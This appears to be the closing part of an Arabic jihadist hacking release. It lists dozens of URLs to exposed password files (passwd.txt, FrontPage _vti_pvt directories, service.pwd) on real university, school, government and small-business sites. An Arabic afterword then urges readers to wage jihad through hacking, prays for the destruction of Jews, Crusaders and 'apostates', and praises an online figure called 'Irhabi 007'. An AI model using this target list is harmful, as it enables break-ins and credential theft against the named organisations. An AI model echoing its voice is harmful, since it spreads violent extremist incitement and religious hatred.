<http://www.uidaho.edu/webboard/src/passwd.txt>

<http://dykesworld.de/Boards/sistah/passwd.txt>

<http://www.public.iastate.edu/~n2ddg/IE565/passwd.txt>

<http://www.pnpi.spb.ru/nrd/ucn/cgi-...dmin/passwd.txt>

[http://www.pnpi.spb.ru/nrd/ucn/cgi-...s\\_admin/log.txt](http://www.pnpi.spb.ru/nrd/ucn/cgi-...s_admin/log.txt)

<http://www.pnpi.spb.ru/nrd/ucn/cgi-...in/adminlog.txt>

<http://www.doc.ic.ac.uk/~ipa98/jondon/passwd.txt>

<http://www.defenders.by.ru/texts/unix/unix-passwd.txt>

<http://www.public.iastate.edu/~benco/occlub/passwd.txt>

<http://www.unionmen.com/forum/passwd.txt>

<http://facyt.uc.edu.ve/foros/passwd.txt>

<http://www.ku.edu/~philos/courses/wwwboard3/passwd.txt>

<http://ponce.inter.edu/forums/passwd.txt>

<http://students.washington.edu/msa/...ulum/passwd.txt>

<http://www.uidaho.edu/webboard/src/passwd.txt>

<http://www.louisville.com/talk/passwd.txt>

<http://www.motosalvagedirectory.com/forums/passwd.txt>

<http://gazissax.best.vwh.net/alsira...oard/passwd.txt>

<http://www.mexconnect.com/liveboard/passwd.txt>

<http://www.inece.org/ozone/passwd.txt>

<http://www.usd.edu/phys/courses/ast...bord/passwd.txt>

<http://cds.unina.it/~tuccillo/passwd.txt>

<http://ponce.inter.edu/forums/prueba/passwd.txt>

<http://paradigm-dc.hypermart.net/passwd.txt>

<http://clonetheory.virtualave.net/passwd.txt>

<http://www.uni-ulm.de/LiLL/foren/forum1/passwd.txt>

<http://www.fh-potsdam.de/~potsmods/...ster/passwd.txt>

<http://www.endicott.edu/staff/kuhn/...9812/passwd.txt>

<http://www.artintheschool.org/forum/passwd.txt>

<http://www.utexas.edu/depts/grg/vir...sion/passwd.txt>

<http://www.mag7.net/floor/passwd.txt>

<http://www.urban-forestry.com/forum/passwd.txt>

<http://pages.globetrotter.net/lhibb...oard/passwd.txt>

<http://wealth-connection.com/bbs/passwd.txt>

<http://xipe.insp.mx/wwwboard/passwd.txt>

<http://facyt.uc.edu.ve/foros/passwd.txt>

<http://c25c250.best.vwh.net/restricted/passwd.txt>

<http://www.sandiego.edu/~deroche/case2/passwd.txt>

<http://www.sandiego.edu/~deroche/group6p/passwd.txt>

<http://home.gwi.net/~actonfd/bboard/passwd.txt>

<http://pages.stern.nyu.edu/~rgarud/helpchat/passwd.txt>

<http://acpon1.ponce.inter.edu/forums/prueba/passwd.txt>

[http://www.gugten.com/\\_pub/ARPA/forum/passwd.txt](http://www.gugten.com/_pub/ARPA/forum/passwd.txt)

<http://library.thinkquest.org/~1013...dmin/passwd.txt>

### ثغرات "فرونت بيج"

[www.ebc.uu.se/evolmuseum/\\_vti\\_pvt/](http://www.ebc.uu.se/evolmuseum/_vti_pvt/)

[http://www.ebc.uu.se/klubban/\\_vti\\_pvt/](http://www.ebc.uu.se/klubban/_vti_pvt/)

[http://police.hypermart.net/\\_vti\\_pvt/](http://police.hypermart.net/_vti_pvt/)

[http://www.seanachie.com/\\_vti\\_pvt/](http://www.seanachie.com/_vti_pvt/)

[http://www.ahpcc.unm.edu/~aroberts/main/\\_vti\\_pvt/](http://www.ahpcc.unm.edu/~aroberts/main/_vti_pvt/)

[http://www.ahpcc.unm.edu/~aroberts/main/main/\\_vti\\_pvt/](http://www.ahpcc.unm.edu/~aroberts/main/main/_vti_pvt/)

[http://www.tpeditor.com/\\_vti\\_pvt/](http://www.tpeditor.com/_vti_pvt/)

[http://www.sussex.ac.uk/tcmr/pgp/pgp2/\\_vti\\_pvt/](http://www.sussex.ac.uk/tcmr/pgp/pgp2/_vti_pvt/)

[http://www.sussex.ac.uk/Units/IRPol/MANews/\\_vti\\_pvt/](http://www.sussex.ac.uk/Units/IRPol/MANews/_vti_pvt/)

[http://members.aol.com/r1953young/\\_vti\\_pvt/](http://members.aol.com/r1953young/_vti_pvt/)

[http://www.lic.wisc.edu/shapingdane/\\_vti\\_pvt/](http://www.lic.wisc.edu/shapingdane/_vti_pvt/)

[http://www.gvc.gu.se/ngeo/ng-hem/china/\\_vti\\_pvt/](http://www.gvc.gu.se/ngeo/ng-hem/china/_vti_pvt/)

[http://www.robertsmyth.leics.sch.uk/\\_vti\\_pvt/](http://www.robertsmyth.leics.sch.uk/_vti_pvt/)

[http://www.www.nr/My%20Webs/\\_vti\\_pvt/](http://www.www.nr/My%20Webs/_vti_pvt/)

[http://siteventos.org.gt/tal\\_1/\\_vti\\_pvt/](http://siteventos.org.gt/tal_1/_vti_pvt/)

[http://siteventos.org.gt/redes/\\_vti\\_pvt/](http://siteventos.org.gt/redes/_vti_pvt/)

[http://virtation.com/\\_vti\\_pvt/](http://virtation.com/_vti_pvt/)

[http://www.ch.ic.ac.uk/bbc/BCG/bcg2001/myweb/\\_vti\\_pvt/](http://www.ch.ic.ac.uk/bbc/BCG/bcg2001/myweb/_vti_pvt/)

[http://www.imolbio.oeaw.ac.at/xenopus/\\_vti\\_pvt/  
t/](http://www.imolbio.oeaw.ac.at/xenopus/_vti_pvt/)

[http://www.humgym-meran.it/\\_vti\\_pvt/](http://www.humgym-meran.it/_vti_pvt/)

[http://www.cceinet.umd.edu/faculty/ahaghani/\\_  
vti\\_pvt/](http://www.cceinet.umd.edu/faculty/ahaghani/_vti_pvt/)

[http://www.chu-stlouis.fr/hematoonco/\\_vti\\_pvt/](http://www.chu-stlouis.fr/hematoonco/_vti_pvt/)

[http://www.ch.ic.ac.uk/local/projec...thorn/\\_vti\\_  
pvt/](http://www.ch.ic.ac.uk/local/projec...thorn/_vti_pvt/)

[http://www.ce.cmu.edu/~mcnamara/\\_vti\\_pvt/](http://www.ce.cmu.edu/~mcnamara/_vti_pvt/)

[http://www.fht-  
stuttgart.de/fbv/fbvweb/ipo/\\_vti\\_pvt/](http://www.fht-stuttgart.de/fbv/fbvweb/ipo/_vti_pvt/)

[http://www.cem.ufpr.br/ecoturismo/\\_vti\\_pvt/](http://www.cem.ufpr.br/ecoturismo/_vti_pvt/)

[http://www.net1.net/~akiecke/\\_vti\\_pvt/](http://www.net1.net/~akiecke/_vti_pvt/)

[http://www.bridgewater.edu/departme...tisms/\\_  
vti\\_pvt/](http://www.bridgewater.edu/departme...tisms/_vti_pvt/)

[http://www.lu.lv/jauna/strukt/jgs/\\_vti\\_pvt/](http://www.lu.lv/jauna/strukt/jgs/_vti_pvt/)

[http://www.jmtrep.hpg.com.br/\\_vti\\_pvt/](http://www.jmtrep.hpg.com.br/_vti_pvt/)

[http://alpha.tamu.edu/public/jae/\\_vti\\_pvt/](http://alpha.tamu.edu/public/jae/_vti_pvt/)

[http://homepages.newnet.co.uk/netwo...k2000/\\_vti\\_pvt/](http://homepages.newnet.co.uk/netwo...k2000/_vti_pvt/)

[http://www.ff.up.pt/sirigaitas/\\_vti\\_pvt/](http://www.ff.up.pt/sirigaitas/_vti_pvt/)

[http://www.cyclecoachingscotland.fr...co.uk/\\_vti\\_pvt/](http://www.cyclecoachingscotland.fr...co.uk/_vti_pvt/)

[http://members.aol.com/tamaranth/\\_vti\\_pvt/](http://members.aol.com/tamaranth/_vti_pvt/)

[http://www.bridgewater.edu/departme...owman/\\_vti\\_pvt/](http://www.bridgewater.edu/departme...owman/_vti_pvt/)

[http://www.css.orst.edu/barley/\\_vti\\_pvt/](http://www.css.orst.edu/barley/_vti_pvt/)

[http://www.nilc.org.ge/geohealth/\\_vti\\_pvt/](http://www.nilc.org.ge/geohealth/_vti_pvt/)

[http://www.memorial.fund.ukf.net/\\_vti\\_pvt/](http://www.memorial.fund.ukf.net/_vti_pvt/)

[http://www.ipe.csic.es/cursos.escos/\\_vti\\_pvt/](http://www.ipe.csic.es/cursos.escos/_vti_pvt/)

[http://dnr.state.il.us/legislation/isah/\\_vti\\_pvt/](http://dnr.state.il.us/legislation/isah/_vti_pvt/)

[http://www.rrk-berlin.de/rrkweb/chirurgie/\\_vti\\_pvt/](http://www.rrk-berlin.de/rrkweb/chirurgie/_vti_pvt/)

[http://www.jtr.gov.my/fik/\\_vti\\_pvt/](http://www.jtr.gov.my/fik/_vti_pvt/)

[http://ww1.baywell.ne.jp/fpweb/drlatham/\\_vti\\_pvt/](http://ww1.baywell.ne.jp/fpweb/drlatham/_vti_pvt/)

[http://www.wms-access.com/Photo%20Gallery/\\_VTI\\_PVT/](http://www.wms-access.com/Photo%20Gallery/_VTI_PVT/)

[http://www.lfp.cz/primaire/\\_vti\\_pvt/](http://www.lfp.cz/primaire/_vti_pvt/)

[http://www.zs3zab.cz/\\_vti\\_pvt/service.pwd](http://www.zs3zab.cz/_vti_pvt/service.pwd)

<http://pages.citenet.net/users/ctmx...pvt/service.pwd>

[http://ftp.scu.edu.tw/\\_vti\\_pvt/service.pwd](http://ftp.scu.edu.tw/_vti_pvt/service.pwd)

<http://orion.ifs.rm.cnr.it/meeting...pvt/service.pwd>

<http://www.momentus.com.br/users/le...pvt/service.pwd>

[http://www2.alpinecom.net/\\_vti\\_pvt/service.pwd](http://www2.alpinecom.net/_vti_pvt/service.pwd)

[http://www.necc.cc.ms.us/~jpowell/\\_vti\\_pvt/service.pwd](http://www.necc.cc.ms.us/~jpowell/_vti_pvt/service.pwd)

[http://conca.users.netlink.co.uk/\\_vti\\_pvt/service.pwd](http://conca.users.netlink.co.uk/_vti_pvt/service.pwd)

وبعد فالحمد رب العالمين في البدء والمنتهى ، الذي وفقنا لإتمام هذا العمل الجليل وكما سألنا الله الصدق والإخلاص في القول والعمل نسأله العفو والصفح ونرجو التوبة والمغفرة ونأمل القبول والرفعة بفضله ولطفه وكرمه سبحانه .

وإننا بنشر هذا الإصدار نقيم الحجة على القاعدين مع الخالفين والمتذرعين بعدم قدرتهم على الوصول إلى ساحات القتال وميادين التزال ، فدونكم هذا الثغر وهذا الميدان فقاتلوا فيه قتال المجاهدين في سبيل الله ولكم الأجر والثواب إن صلحت الطوايا وخلصت النيات ، والله يقول الحق وهو يهدي السبيل .

ونسأل الله النصر المجيد والفتح المبين والفرج القريب لأمة الإسلام عامة ولطليعتها المجاهدة والمقاتلة في سبيل الله خاصة ، فاللهم أقرّ عيون قادة الجهاد وشيوخه وعلماءه وأنصاره بنصرك المبين وفتحك القريب ، اللهم ودمّر أعداء الأمة من اليهود والصليبيين ومن شايعهم وناصرهم ووالاهم من المنافقين المرتدين أجمعين ؛ اللهم آمين .

وختاماً نسأل الله أن يحفظ أئحانا الفاضل الكريم والغالي الحبيب إرهابي 007 وأن يقيه لما يسرّ المؤمنين ويفرح قلوب الموحدين في كل مكان ، ولما يسوء الكافرين ويخزي المرتدين ويفضح المنافقين .

ولا تنسوا أوامر الله في كتابه العظيم وأوامر رسوله صلى الله عليه وسلم بالجهاد في سبيل الله في كل ثغر والقعود للعدو في كل مرصد يرضي الله ورسوله !

## فلندع القول ولنبدأ العمل !

ومشوار الألف ميل يبدأ بخطوة ! وأول الغيث الندى !

وآخر دعوانا أن الحمد لله رب العالمين

وصلى الله وسلم وبارك وأنعم وأكرم على سيدنا ونبينا محمد وعلى آله وصحبه  
ومن تبعهم بإحسان إلى يوم الدين

عن جميع الإخوة الأفاضل الكرام

أخوكم الفقير أصغرهم وأجهلهم

السيف الأثري

كان الله له وإخوانه وللمسلمين